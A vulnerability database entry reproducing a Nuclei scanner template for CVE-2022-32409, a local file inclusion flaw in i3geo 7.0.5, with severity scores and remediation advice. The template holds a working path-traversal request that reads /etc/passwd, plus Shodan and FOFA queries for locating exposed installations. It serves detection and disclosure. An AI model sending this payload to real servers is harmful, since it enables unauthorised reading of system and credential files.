Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-32409
HistoryJul 21, 2022 - 2:30 a.m.

Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion

2022-07-2102:30:33
ProjectDiscovery
github.com
4

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.4 High

AI Score

Confidence

High

0.473 Medium

EPSS

Percentile

97.5%

Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request.

id: CVE-2022-32409

info:
  name: Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion
  author: pikpikcu
  severity: critical
  description: Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
  remediation: |
    Apply the latest patch or upgrade to a newer version of i3geo to fix the LFI vulnerability.
  reference:
    - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt
    - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion
    - https://nvd.nist.gov/vuln/detail/CVE-2022-32409
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-32409
    cwe-id: CWE-22
    epss-score: 0.47251
    epss-percentile: 0.97452
    cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: softwarepublico
    product: i3geo
    shodan-query: http.html:"i3geo"
    fofa-query: body="i3geo"
  tags: cve2022,cve,i3geo,lfi,softwarepublico

http:
  - method: GET
    path:
      - "{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 490a0046304402200cdd4318d7c194aab2715822710f278ab82b1651453ebb3d4fa447815c8ac0420220108b44251c0d6176d3b3045e9d38ede9a7cce2af1db1f24d9018e82017746b9b:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.4 High

AI Score

Confidence

High

0.473 Medium

EPSS

Percentile

97.5%

Related for NUCLEI:CVE-2022-32409